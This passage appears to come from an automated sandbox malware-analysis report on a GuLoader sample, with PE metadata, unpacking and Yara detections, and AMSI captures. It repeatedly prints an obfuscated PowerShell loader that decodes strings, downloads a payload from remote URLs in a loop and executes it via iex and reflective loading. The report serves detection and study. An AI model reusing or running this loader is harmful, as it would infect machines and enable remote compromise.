Source: Binary string: stem.Core.pdbP source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Unpacked PE file: 4.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Unpacked PE file: 5.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Unpacked PE file: 6.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Yara detected GuLoader
Source: Yara match File source: 0000000B.00000002.4571603039.000000000A795000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Whiffer)$global:Hebenon = [System.Text.Encoding]::ASCII.GetString($Forlis)$global:Desquamations=$Hebenon.substring($Hjsangs,$Destalinising)<#Afslutt Adoptivdtrenes nedrulningen Salin
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Discommend175 $Fugitating120 $Kortspillene), (Wraithy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Institutionaliser = [AppDomain]::CurrentDomain.GetAss
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Leveringstidspunktet)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($blankoveksel, $false).DefineType($Ly
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Whiffer)$global:Hebenon = [System.Text.Encoding]::ASCII.GetString($Forlis)$global:Desquamations=$Hebenon.substring($Hjsangs,$Destalinising)<#Afslutt Adoptivdtrenes nedrulningen Salin
Obfuscated command line found
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( 